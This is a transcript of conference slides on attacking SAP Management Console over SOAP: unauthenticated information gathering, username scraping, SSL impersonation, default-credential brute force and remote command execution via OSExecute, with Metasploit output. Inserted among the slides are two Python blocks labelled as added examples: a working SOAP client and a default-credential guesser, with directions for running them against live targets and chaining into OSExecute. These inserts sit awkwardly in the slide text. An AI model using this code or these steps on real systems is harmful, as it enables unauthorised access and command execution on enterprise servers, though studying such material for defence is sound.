SecZone 2011 - Cali, Colombia
(29th Nov. 2011)
SAP (in)security:
Scrubbing SAP clean with SOAP
------
Note
------
This is a slightly updated version of my Hashdays 2011 talk.
----------
Abstract:
----------
At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP!
----------
Hashdays Conference (29th Oct. 2011)
SAP (in)security:
Scrubbing SAP clean with SOAP
13. “…the world's leading provider of
business software, SAP (which stands for
"Systems, Applications, and Products in
Data Processing") delivers products and
services that help accelerate business
innovation for our customers.”
14. Other people describe them as…
“…the world's leading repository of
business critical information, SAP (which
stands for "Security Ain't [our] Problem")
delivers products and services that help
attackers gain access to critical
enterprise data.”
19. So Many Reasons
Vulnerabilities are a part of it!
Every system has its vulnerabilities
SAP installations often fall to the business
Not an operations problem
Financial data should be handled by the business
Security team never gets close to it!
20. “YOU CAN'T TEST THAT, IT'S
BUSINESS CRITICAL!”
UNKNOWN PROJECT MANAGER
22. You’re getting SOAP all over my SAP!
THIS TALK
SAP Security
NetWeaver
SOAP
33. SAP MC Communications
Default port 5<instance>13/14
50013 HTTP
50014 HTTPS
Can use SSL
If it's configured
More on this later!
34. SAP MC Communications
Uses Basic auth for some functions
Yes... It's 2011
Yes... Companies still use Basic Auth
Most functions don't even use that!
Yes... Unauthenticated!
44. Information is king
Version information
Sure, HTTP headers give that!
Nothing new here... mostly
Down to the patch-level
Can you say "targeted attack"?
45. Version Information
msf auxiliary(sap_mgmt_con_version) > show options

Module options (auxiliary/scanner/sap/sap_mgmt_con_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOSTS   172.16.15.128    yes       The target address range
   RPORT    50013            yes       The target port
   THREADS  1                yes       The number of threads
   URI      /                no        Path to the SAP MC
   VHOST                     no        HTTP server virtual host
47. Version Information
msf auxiliary(sap_mgmt_con_version) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Version Number Extracted - 172.16.15.128:50013
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
49. Information is king
Startup profile
Instance name
SAP System Name
SAP SID
SAP DB Schema
Paths
....
52. Information is king
Server / Instance Environment
Computername
OS Service username
Database Names
Database Type (Oracle, MaxDB, ...)
Full Server Environment Variable list!
Information overload
OMG why!
54. Environment
msf auxiliary(sap_mgmt_con_getenv) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[*] COMPUTERNAME=WINXPSAP-TST
[*] ComSpec=C:\WINDOWS\system32\cmd.exe
[*] DBMS_TYPE=ada
[*] FP_NO_HOST_CHECK=NO
[*] OS=Windows_NT
[*] USERNAME=SAPServiceNSP        <- the operating system user
[*] PSModulePath=C:\windows\system32\PowerShell...
[*] SAPEXE=E:\usr\sap\NSP\SYS\exe\uc\NTI386
[*] TMP=E:\usr\sap\NSP\tmp
55. Information is king
SAP Log/Tracefiles
SAP Startup Logs
Error / Debug Logs
Developer Traces
Security Logs
SAP ABAP SysLog
SAP Startup Times
PIDs
Services + Status Info
57. Log/Trace Files
<SAPControl:ReadDeveloperTraceResponse>
<name>E:\usr\sap\NSP\DVEBMGS00\work\dev_w0</name>
<item>trc file: "dev_w0", trc level: 1, release: "720"</item>
<item>---------------------------------------------------</item>
<item>* ACTIVE TRACE LEVEL 1</item>
<item>M pid 3564</item>
<item>M DpSysAdmExtCreate: ABAP is active</item>
<item>M DpShMCreate: allocated sys_adm at 09A40048</item>
<item>M DpShMCreate: allocated wp_adm at 09A43020</item>
<item>M DpShMCreate: allocated tm_adm at 09A47E48</item>
…
58. ABAP Log File
<SAPControl:ABAPReadSyslogResponse><log>
<item><Time>2011 10 14 15:06:18</Time>
<Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)
</Text><Severity>SAPControl-GREEN</Severity></item>
<item><Time>2011 10 14 15:06:12</Time>
<Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4;
Unicode Version 4.1
</Text><Severity>SAPControl-GREEN</Severity></item>
…
59. Information is king
Extracting data from logfiles
Logfiles include usernames
Scrape for SAP usernames
Instant brute-force user list!
Just an example of the data available
62. Information is king
Process Parameters
Output of the entire SAP configuration
Password Policies
Setup your Brute-force just right ;)
Hash Types
Still supporting those old 8 char hashes?
Security Audit Log Enabled ?
rsau/enabled (default: 0)
Is anybody watching?
63. Process Parameters
msf auxiliary(sap_mgmt_con_getprocessparameter) > run
[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
[*] [SAP] Attempting to match (?i-mx:^login/password)
[SAP] Process Parameters

   Name                                    Value
   ----                                    -----
   login/password_charset                  1
   login/password_downwards_compatibility  1
   login/password_hash_algorithm           encoding=RFC2307, algorithm=iSSHA-1, saltsize=96
   login/password_max_idle_productive      0
67. Information is king
Useful Process Parameters
rsau/enabled
login/password_downwards_compatibility
login/failed_user_auto_unlock
login/fails_to_user_lock
login/min_password_lng
login/password_charset
....
* Check out consolut.com for a great list
68. “I put a whitebox configuration audit
in your blackbox penetration test, so
you can whitebox SAP while you
blackbox it!"
Quote by:
Me, just now!
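The SOAP interface described on the SAP MC slides (port 5<instance>13/14, unauthenticated web methods) and the information-gathering steps above (the ReadDeveloperTrace and ABAPReadSyslog responses, scraping user names for a brute-force list, the process-parameter "whitebox audit") as one added example in Python. It is not code from the talk or from the Metasploit modules it shows. It assumes the urn:SAPControl namespace and method names from the sapstartsrv WSDL, that GetProcessParameterResponse items carry <name>/<value> children, that ABAPReadSyslogResponse items carry a <User> child, that OSExecute takes its command in a <command> element, and the thresholds in POLICY; the two sample replies are constructed to look like the talk's NSP instance.

```python
"""SAP Management Console (sapstartsrv) SOAP client and whitebox parameter audit.

Added example, not code from the talk or the Metasploit modules it shows.
Assumptions: the urn:SAPControl namespace and web-method names of the sapstartsrv
WSDL, <name>/<value> on GetProcessParameterResponse items, <User> on
ABAPReadSyslogResponse items, and the POLICY thresholds. Sample replies are constructed.
"""
import re
import urllib.request
import xml.etree.ElementTree as ET

SAPCONTROL_NS = "urn:SAPControl"
SOAP_ENV_NS = "http://schemas.xmlsoap.org/soap/envelope/"

def build_envelope(method, params=None):
    """SOAP 1.1 envelope for one SAPControl web method (e.g. OSExecute with <command>)."""
    args = "".join(f"<{k}>{v}</{k}>" for k, v in (params or {}).items())
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV_NS}" xmlns:SAPControl="{SAPCONTROL_NS}">'
        f"<SOAP-ENV:Body><SAPControl:{method}>{args}</SAPControl:{method}></SOAP-ENV:Body>"
        "</SOAP-ENV:Envelope>"
    )

def mc_port(instance, https=False):
    """sapstartsrv listens on 5<instance>13 (HTTP) and 5<instance>14 (HTTPS)."""
    return int(f"5{int(instance):02d}{14 if https else 13}")

def call(host, instance, method, params=None, https=False, timeout=10):
    """POST the envelope with no credentials at all (live call, not used offline)."""
    url = f"{'https' if https else 'http'}://{host}:{mc_port(instance, https)}/"
    headers = {"Content-Type": "text/xml; charset=utf-8", "SOAPAction": '""'}
    req = urllib.request.Request(url, build_envelope(method, params).encode("utf-8"), headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")

def _response(xml_text, tag):
    node = ET.fromstring(xml_text).find(f".//{{{SAPCONTROL_NS}}}{tag}")
    if node is None:  # SOAP fault or a protected method: nothing to parse
        raise ValueError(f"reply carries no {tag}")
    return node

def process_parameters(xml_text):
    """GetProcessParameterResponse -> {parameter name: value}."""
    node = _response(xml_text, "GetProcessParameterResponse")
    return {it.findtext("name"): it.findtext("value", "") for it in node.iter("item")}

def syslog_users(xml_text):
    """ABAPReadSyslogResponse -> sorted, de-duplicated user names: an instant brute-force list."""
    node = _response(xml_text, "ABAPReadSyslogResponse")
    return sorted({(it.findtext("User") or "").strip() for it in node.iter("item")} - {""})

def parse_version(version_info):
    """'720, patch 70, changelist 1203517, ...' -> release/patch/changelist for targeting."""
    m = re.search(r"(\d+), patch (\d+), changelist (\d+)", version_info)
    return None if m is None else {"release": m[1], "patch": int(m[2]), "changelist": int(m[3])}

# Expected values are this example's choices, not an SAP baseline.
POLICY = {
    "rsau/enabled": (lambda v: v == "1", "security audit log disabled: nobody is watching"),
    "login/password_downwards_compatibility": (lambda v: v == "0", "legacy 8-char hashes still accepted"),
    "login/min_password_lng": (lambda v: int(v) >= 8, "minimum password length below 8"),
    "login/fails_to_user_lock": (lambda v: int(v) <= 5, "lock threshold above 5 failed logons"),
}

def audit_parameters(params):
    """[(name, value, finding)] for every POLICY parameter that fails or is missing."""
    findings = []
    for name, (is_ok, why) in POLICY.items():
        value = params.get(name)
        try:
            passed = value is not None and is_ok(value)
        except ValueError:  # non-numeric value where a number was expected
            passed = False
        if not passed:
            findings.append((name, value, why))
    return findings

# Constructed replies modelled on the talk's NSP instance on WINXPSAP-TST.
SAMPLE_PARAMS = f"""<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV_NS}" xmlns:SAPControl="{SAPCONTROL_NS}">
<SOAP-ENV:Body><SAPControl:GetProcessParameterResponse><parameter>
<item><name>rsau/enabled</name><value>0</value></item>
<item><name>login/min_password_lng</name><value>6</value></item>
<item><name>login/password_downwards_compatibility</name><value>1</value></item>
<item><name>login/fails_to_user_lock</name><value>5</value></item>
</parameter></SAPControl:GetProcessParameterResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""

SAMPLE_SYSLOG = f"""<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV_NS}" xmlns:SAPControl="{SAPCONTROL_NS}">
<SOAP-ENV:Body><SAPControl:ABAPReadSyslogResponse><log>
<item><Time>2011 10 14 15:06:18</Time><User></User><Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)</Text><Severity>SAPControl-GREEN</Severity></item>
<item><Time>2011 10 14 15:09:41</Time><User>DDIC</User><Text>Logon failed (reason=1, type=A)</Text><Severity>SAPControl-YELLOW</Severity></item>
<item><Time>2011 10 14 15:10:05</Time><User>SAP*</User><Text>Logon failed (reason=1, type=A)</Text><Severity>SAPControl-YELLOW</Severity></item>
<item><Time>2011 10 14 15:12:30</Time><User>DDIC</User><Text>Logon successful (type=A)</Text><Severity>SAPControl-GREEN</Severity></item>
</log></SAPControl:ABAPReadSyslogResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""

if __name__ == "__main__":
    print(audit_parameters(process_parameters(SAMPLE_PARAMS)), syslog_users(SAMPLE_SYSLOG))
```

Against a live instance, call(host, "00", "GetProcessParameter") fetches the reply that process_parameters() and audit_parameters() turn into the three findings the sample produces (audit log off, downwards-compatible hashes, short minimum length); syslog_users() on a ReadSyslog reply gives the user list for the brute-force step. An instance whose sapstartsrv profile sets service/protectedwebmethods rejects these calls without credentials, so a ValueError from _response() on a fresh target is a sign the "restrict it to administrators" fix is already in place.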
95. Getting in the middle
Device Default
Often the same on EVERY device
Not an option for SAP
96. Getting in the middle
Enterprise CA
You sign your own certs centrally
PKI Infrastructure
97. Getting in the middle
Externally signed
Diginotar to the rescue!
SAP also offer signing services
98. Getting in the middle
Impersonate SSL
There's a module for that!
Metasploit (ssl_impersonate.rb)
Creates a fake cert
As close to the original as possible
Useful social-engineering (SE) options
Expired yesterday
Add CN names for ease of use
99. Getting in the middle
As near as darn a clone of the original
Fingerprints + Serial Number differ
100. Getting in the middle
All CN data is 100% cloned…
Average users don’t care!
108. Brute Force
msf auxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP
msf auxiliary(sap_mgmt_con_brute_login) > run
[*] SAPSID set to 'NSP' - Setting default SAP wordlist
[*] Trying username:'sapservicensp' password:''
[-] [01/18] - failed to login as 'sapservicensp' password: ''
[*] Trying username:'sapservicensp' password:'sapserviceNSP'
[-] [02/18] - failed to login as 'sapadm' password: ''
[*] Trying username:'nspadm' password:''
…
109. OSExecute
auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128
auxiliary(sap_..._osexec) > set USERNAME sapservicensp
auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n
auxiliary(sap_..._osexec) > set CMD hostname
auxiliary(sap_..._osexec) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Command run as PID: 1240
Command output
--------------
WINXPSAP-TST
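The default-credential guess on the Basic-auth methods (slide 108) that leads into the OSExecute step, as an added Python example that is not the talk's sap_mgmt_con_brute_login module. It derives candidates from the SID the way the slide output suggests (sapservice<sid>, <sid>adm and sapadm, with the empty and service-name passwords), builds the Authorization header, and stops on the first accepted pair or on any status other than 401, so a lockout or a protected method is noticed instead of hammered. The module's real wordlist is not reproduced; the extra password patterns are this example's assumptions, and the HTTP transport is abstracted behind a function so the demo runs offline against a constructed stand-in.

```python
"""Default-credential guessing for the SAP MC web methods that use HTTP Basic auth.

Added example, not the talk's Metasploit module. The SID-derived candidates mirror
the slide output; the extra password patterns are this example's assumptions.
"""
import base64

def sid_wordlist(sid):
    """Ordered (username, password) candidates derived from the SAP system ID."""
    low, up = sid.strip().lower(), sid.strip().upper()
    users = [f"sapservice{low}", f"{low}adm", "sapadm"]
    passwords = ["", f"sapservice{up}", f"sapservice{low}", low, up, f"{low}adm"]
    candidates = []
    for user in users:
        for pw in passwords:
            if (user, pw) not in candidates:  # an empty SID would otherwise repeat pairs
                candidates.append((user, pw))
    return candidates

def basic_auth_header(user, password):
    """Basic credentials: base64(user:password), sent in the clear on port 5<nn>13."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return {"Authorization": f"Basic {token}"}

def guess_credentials(transport, sid, stop_on_first=True):
    """transport(headers) -> HTTP status. 401 means wrong credentials, 200 means the
    method ran; anything else (a SOAP fault, a lockout, a protected method) aborts
    the run rather than burning the account."""
    hits = []
    for user, pw in sid_wordlist(sid):
        status = transport(basic_auth_header(user, pw))
        if status == 200:
            hits.append((user, pw))
            if stop_on_first:
                break
        elif status != 401:
            raise RuntimeError(f"unexpected HTTP {status} for {user!r}; stopping")
    return hits

def fake_sap_mc(valid_user, valid_password):
    """Constructed stand-in for sapstartsrv that accepts exactly one credential pair."""
    def transport(headers):
        scheme, _, token = headers.get("Authorization", "").partition(" ")
        if scheme != "Basic":
            return 401
        user, _, pw = base64.b64decode(token).decode("utf-8").partition(":")
        return 200 if (user, pw) == (valid_user, valid_password) else 401
    return transport

if __name__ == "__main__":
    mc = fake_sap_mc("sapservicensp", "sapserviceNSP")
    for user, pw in sid_wordlist("NSP")[:3]:
        print(f"[*] Trying username:{user!r} password:{pw!r}")
    print("[+] hits:", guess_credentials(mc, "NSP"))
```

The list is 18 candidates for a three-letter SID, which is the same attempt count the slide's [01/18] counter shows. To run it for real, replace the transport with a function that POSTs the OSExecute envelope with the returned header to port 5<instance>13 and returns the HTTP status; once a pair is accepted the same credentials feed the OSExecute module above.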
119. Fixing the issues
SAP Fix
Note 1439348
Issue also discovered by Onapsis
No idea what it says!
SAP restricts ALL fix info to customers only
127. Big Thanks
The REAL SAP Security Researchers
Onapsis, DSecRG, Raul Siles, CYBSEC
SAP PSRT (for emailing me a lot)
DirtySec (You know who you are!)
MacLemon (for the PPT-fu)
ED
For inviting us, even though we cause problems!
All the people who helped make this happen
Yeah… I said that! SAP is a perfect target for attackers. All the company's crown jewels in one place!
In 2010 SAP released more than 900 fixes… SAP is a complex product, and complex products always have flaws. Research into coding flaws shows 15-50 bugs per 1000 lines of delivered code… not all are security related, but that's still a lot of bugs!
It's not ALL SAP's fault… complex configurations, user error, maintaining backwards compatibility… take your pick. In offering so much, SAP are their own worst enemy.
If security never see it, how can they secure it? More importantly, if they don't understand it, how can they ever hope to secure it!
Think about THAT logic for a second! I'm pretty sure every security professional has heard that at one point or another.
So what's this SOAP thing then?
Not a cleaning product! We'll be using it to scrub SAP clean, however. I'm sure lots of you have heard of Web Services: simply XML over HTTP or HTTPS. Flexible (can run over SMTP...). SO HOW DOES SOAP FIT INTO OUR SAP TOPIC?
Yes, it's a sad sad world! SAP MC uses a range of unauthenticated requests, but some of the more fun functions require username/password authentication.
Lots of cool data. Lots of cool functions. Lots of fun to be had!
There's pages of this stuff… much too much for a slide… and much too much to make this stuff available for attackers!
dbms_type: the database interface recognizes the type of the database system by the environment variable dbms_type. Possible values: ora, inf, db2, db4, db6, ada, mss. OLDER VERSIONS of SAP can include environment variables such as MSSQL_USER.
Effect of password policies on keyspace reduction (openwall): different password compliance rules can reduce the overall keyspace considerably!
So I scanned a small country!
What do we have already? Full server environment, version info, SAP SID, database info, valid SAP usernames, trace and debug logs.
Wait... SSL will save us!
Yep.. It's a feature, remember? But we've already covered how we could get that.
OSExecute is all well and good... Run a single command. Get the response..
Block it. Filter it. Restrict it to administrators. YES, this means internally as well!